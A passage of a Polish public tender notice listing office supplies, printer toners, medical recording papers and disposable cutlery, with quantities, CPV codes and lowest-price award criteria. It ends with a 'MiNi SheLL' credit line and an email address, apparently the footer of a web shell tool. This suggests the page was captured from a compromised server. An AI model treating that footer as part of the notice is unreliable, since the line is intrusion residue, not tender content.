48	Taśma pakowa szara	szt	100
49	Taśma do drukarki EPSON ERC-09B (RIBBON CARTRIDGE) czarna	szt	60
50	Teczka do podpisu z kieszonką wizytową szt	25
51	Teczka wiązana 	szt	500
52	Teczka z gumką	szt	600
53	Tusz do pieczątek czerwony	szt	8
54	Tusz do pieczątek czarny	szt	80
55	Tusz do pieczątek niebieski 	szt	15
56	Tusz do pieczątek zielony	szt	15
57	Wąsy do skoroszytów zielone (op=25szt)	op	5
58	Zeszyt A5 (kratka 96str.)	szt	150
59	Zeszyt A4 (kratka 96str.)	szt	200
60	Zszywacz 24/6	szt	40
61	Zszywki 24/6 (opakowanie jednostkowe)	op	500
62	Zszywki 23/13 do 100 kartek (op=1000szt)	op	10
63	Taśma dwustronna (szer 50 mm)	szt	12
64	Korytka na dokumenty A4 szt	30
65	Marker  /czerwony , zielony,niebieski /szt	30
66	Linijka  30cm	szt	5
67	Rozszywacz	szt	5
68	Ołówek	szt	50
69	Datownik	szt	2
70	Podkładka z klipsem na dokumenty A4	szt	80
71	Podkładka z klipsem   na dokumenty A3	szt	100
72	Długopis/czerowny,zielony,niebieski /szt	1000
73	Kalendarz dzienny  A4 szt	10
74	Kalendarz dzienny A5 szt	15
75	Kalendarz dzienny B5 szt	10
76	Magnesy do tablicy 1 op /10sztop	3
77	Tablica magnetyczna suchościeralna 120x80 szt	1
78	Pinezki do tablicy korkowej 1 op/50szt op	15
79	Mazaki kolorowe do tablicy suchościeralnejszt	10
80	Kredki ołówkowe 1 op/12szt op	10
81	Kredki świecowe 1 op/12szt op	10
82	Bibuła marszczona 1 op / 5 szt kolorówop	15
83	Papier kolorowy szt	6
84	Blok kolorowy szt	40
85	Farby plakatowe szt	8
86	Temperówki	szt	10
87	Sznurek z surowca 20 m naturalnego	rol	2
88	Kreda do tablicy 1op/10szt op	1
89	Skorowidz  alfabetyczny	szt	10
90	Koperty babelkowe 1op/50szt 240x275 op 2
91	Płyn do tablicy suchościeralnej	szt	2
92	Ofertówki sztywne otwierane 1op/100szt
z góry i po rawej strony op	2
93	Karteczki samoprzylepne 700x525 bl	10
94	Karteczki samoprzylepne/zakładki 150x450 bl	5
95	Szablony z cyframi samoprzylepne białe 8mm szt	10
96	Szablony z cyframi samoprzylepne czarne 15mm szt	10
97	Kalkulator typu  CITIZEN SDC 44S szt 5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> TONERY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	TAŚMA FOLIA UX 92 (op=2szt)	zamiennik	 szt	4	wydajność 90str
2	Toner do drukarki OKI MB 471 oryginał szt	2	wydajność 7 000str
3	Toner do OKI B 401D oryginał	szt	10	                wydajność 2 500str.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Papiery rejestrujące.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Papier termiczny - rolka 110x30	szt	60
2	Papier EKG DEC 631 (145*150*300)	szt	10
3	Papier Mitsubishi K-61 (110*20)	szt	80
4	Papier Mitsubishi K-65 (110*20)	szt	120
5	Papier Schiller AT-10 (210*140*400)	szt	50
6	Papier Schiller AT-1 (90*90*400)	szt	100
7	Papier Schiller AT-2 (210*280*240)	szt	150
8	Papier Ascard (112*25)-rolka	szt	20
9	Papier EKG PC Lifepack (108*25)	szt	10
10	Papier termiczny - rolka (57*30) (1op=10szt)	szt	550
11	Papier termiczny - rolka (28*25) (1op=10szt)	szt	120
12	Papier do programu Medtronic 9790 (110*15*300)	szt	15
13	Papier do defibrylatora HP 50mm z nadrukiem no.40457c/40457d	szt	15
14	Papier termiczny do Autorefraktometra ZEISS HUMPREY model 599-6643 - rolka 57mm	szt	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> sztućce, opakowania jednorazowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Widelce jednorazowe, białe plastikowe, posiadające atest do kontaktu z żywnością, op.100 szt. 	szt	53
2	Łyżki jednorazowe, białe plastikowe, posiadające atest do kontaktu z żywnością, op.100 szt. 	szt	53
3	Kubek jednorazowy 200ml biały, posiadający atest do kontaktu z żywnością 100szt w opakowaniu	szt	8
4	Folia spożywcza PE  samoprzylepna,  o długości 30 mb, szerokość 30 cm	szt	15
5	Folia aluminiowa spożywcza o długości 10 mb, szerokość 30 cm, posiadająca atest do kontaktu z żywnością 	szt	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.21.10-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com